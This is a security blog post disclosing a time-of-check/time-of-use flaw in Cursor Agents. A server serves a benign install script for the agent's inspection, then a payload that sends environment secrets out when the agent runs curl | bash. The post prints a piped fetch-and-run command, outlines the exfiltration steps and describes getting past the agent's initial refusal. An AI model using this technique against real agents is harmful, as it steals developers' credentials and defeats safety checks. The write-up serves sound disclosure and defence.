SECURITY 101

Featured

Bypassing Cursor Agents Guardrails: Script Inspection Flaw

Tal Lavi

March 25, 2026

•

Share this post

Responsible Disclosure - This issue was responsibly disclosed to Cursor prior to publication via security-reports@cursor.com. The report was reviewed but ultimately classified as out of scope.

AI coding agents are increasingly trusted with powerful capabilities inside developer environments. They can install tools, run shell commands, access repositories, and interact with system resources.

While these capabilities dramatically increase productivity, they also create new attack surfaces.

During testing of Cursor Agents, we discovered a vulnerability that allows a malicious installation script to bypass the agent’s safety inspection process and exfiltrate secrets from the developer environment.

The root cause is a classic time-of-check / time-of-use (TOCTOU) flaw in how installation scripts are inspected and executed.

In short:

The agent carefully analyzes a script before executing it but ultimately executes a different script than the one it inspected.

This allows a malicious server to deliver a benign script during inspection and a malicious script during execution. This can be seen in the diagram in the sections below.

Why Does This Matter?

Modern AI coding agents operate inside environments that frequently contain sensitive credentials such as:

GitHub tokens
API keys
Cloud credentials
Internal repository access tokens
Environment variables

If an attacker tricks an agent into running a malicious script, those secrets are suddenly within reach. Agents often scan code before executing it. But that safeguard only matters if the code being scanned is the code that actually runs. In this case, it wasn't.

The Cursor Agent Vulnerability

Cursor Agents can install tools from the internet when instructed by a user.

When given installation instructions, the agent typically performs a safety analysis workflow that looks roughly like this:

Perform a web search to learn more about the tool to ensure that it’s legitimate
Investigate how to install it - it may attempt to find alternative download paths as well if the official method seems risky
Fetch the installation script
Inspect the script contents
Download and analyze referenced binaries
Attempt to reason about safety
Execute the installation command

The execution step often takes the form:

curl -sSL <url> | bash

The full vulnerability flow is described by the diagram below:

However, this command performs a new network request, creating a TOCTOU (time of check/time of use) condition; in other words, the script inspected by the agent is not guaranteed to match the script that is executed.

This is where our attack lies - a malicious server can exploit this by returning different responses for different requests.

Attack Overview

The attack relies on serving two different scripts.

First Request: Inspection Phase

The server returns a benign installation script. It contains shell instructions that look like a regular installation script which:

Downloads the program binary (a dummy program made to appear like a legitimate tool)
Verifies the hash with our server
Creates a (dummy) configuration file for the binary

The agent inspects this script, manually fetches the binary for analysis, and determines that the installation appears safe. It then decides to proceed with the installation script.

Second Request: Execution Phase

The server returns a malicious script instead.

Despite having already downloaded the installation script, which could be used to avoid this attack by running it directly, the agent decides to run the entire installation command

curl -sSL <link> | bash

Because the agent executes using curl | bash, it downloads the script again without re-inspecting it, and the malicious script is executed with full shell access to the developer environment.

Proof of Concept

To demonstrate the issue, we created a proof-of-concept installation site which provides installation instructions:

curl -sSL https://pensec.ai/agentshield/api/install | bash

‍

Step 1: Agent Investigation

When instructed to install the tool, the agent performs several investigation steps. It:

searches online for the tool and investigates the website
determines the legitimacy of the website
fetches the installation script
inspects the script contents
downloads the referenced binary
attempts to analyze metadata and system calls
reasons about whether the installation appears legitimate

After this analysis, the agent determines the installation appears safe.

Step 2: Script Execution

The agent then executes the installation command:

curl -sSL <link> | bash

The server detects that the same client has requested the script twice within a short time window (we set this window to 5 minutes).

Instead of returning the inspected script, the server now returns a different payload.

Step 3: Malicious Payload

The malicious script performs the following actions:

Reads sensitive environment variables
Encodes their values
Sends them to a remote endpoint via HTTP POST

The agent executes this script without re-inspecting it, since it was piped using | bash

Secret Exfiltration

During testing, the malicious script successfully accessed secret environment variables.

These included credentials such as:

environment variables
GitHub tokens
API keys
other secrets present in the workspace

For the proof of concept, the script only exfiltrated the first three characters of the GitHub token.

The value began with:

ghp

This confirms the token was valid without exposing the full secret.

Redaction Does Not Protect Shell Execution

Interestingly, the agent normally redacts secrets when asked directly - for example, if prompted to reveal environment variables, the model hides the values.

However, (despite the agent’s claims) shell commands executed by the agent still have access to the raw environment variables.

This means that even if the model refuses to reveal secrets directly, those secrets remain accessible to executed scripts (and still to the model itself); Model-level redaction does not protect against shell-level access.

Model Behavior Differences

Testing also revealed significant differences between models.

Weaker Models

Some models (such as Composer 1.5) simply executed the installation command immediately without inspecting the script. In these cases, the attack succeeded even without the TOCTOU technique.

Stronger Models

More capable models attempted to inspect the installation script before execution.

However, because execution used a fresh network request, the inspected script and executed script could still differ.

Testing was performed using:

Cursor Agents
Ubuntu environment
Sonnet 4.6 High model

Initial Refusal and Guardrail Bypass

Importantly, the agent did not always install the tool immediately.

In initial attempts using weaker attack setups, the agent was quick to shut down attempts based almost solely on website content.

‍

This demonstrates that the agent’s guardrails can sometimes prevent installation of untrusted software.

However, by presenting the installation in a way that appeared legitimate, the agent eventually proceeded with the installation.

This shows that the attack is not simply the agent “doing what it was told”, but rather a case where the agent’s own safety evaluation was bypassed.

Realistic Attack Scenarios

The vendor response classified this issue as requiring a user to instruct the agent to install software from an untrusted host, as the prompt was:

install this tool: <link>

In practice, real-world attacks would rarely appear this explicit.

Several realistic scenarios could trigger the behavior:

A compromised repository containing malicious installation instructions
Documentation that appears legitimate but contains attacker-controlled install scripts
Prior prompt injection attacks that cause the agent to install dependencies
Packages that initially appear benign but later change behavior

An attacker could also design installation pages to appear more trustworthy through:

legitimate looking documentation
binaries that pass initial inspection
staged payloads delivered only during execution

This makes the attack feasible without requiring a user to knowingly install software from an obviously malicious host.

Root Cause

The root cause is architectural.

Script inspection and script execution are performed as separate operations.

The process effectively looks like this:

Download script
Inspect script
Execute curl | bash

Step 3 performs a new network request, breaking the trust chain between inspection and execution as the inspected artifact is not guaranteed to match the executed artifact.

This could easily be avoided by executing the script that was already downloaded and inspected:

./path/to/script.sh

Lessons for AI Agent Security

Several security design lessons emerge from this research.

Bind Inspection to Execution

The inspected artifact must be the same artifact that is executed.

Possible mitigations include:

downloading scripts once and executing the local copy
hashing inspected artifacts
enforcing checksum validation

Avoid curl | bash

Piping network responses directly into shell execution creates a fragile trust boundary.

Isolate Secrets from Agent Execution

Shell commands run by agents do not always need to have unrestricted access to environment secrets.

Enforce Guardrail Decisions

Policies identified during model reasoning must be enforced at execution time.

Conclusion

AI coding agents are quickly becoming powerful automation tools within developer environments.

However, as this research shows, safety mechanisms built on script inspection can fail if the inspected artifact is not guaranteed to be the artifact that is executed.

In this case, a simple TOCTOU flaw allowed a malicious server to bypass inspection and execute a payload capable of exfiltrating secrets from the developer environment.

As AI agents become more deeply integrated into software development workflows, robust execution controls and strict artifact verification will be essential for maintaining secure boundaries.

Arnica's application security platform extends protection to agentic environments — enforcing rules, detecting exposed secrets, and monitoring execution boundaries in real time.

‍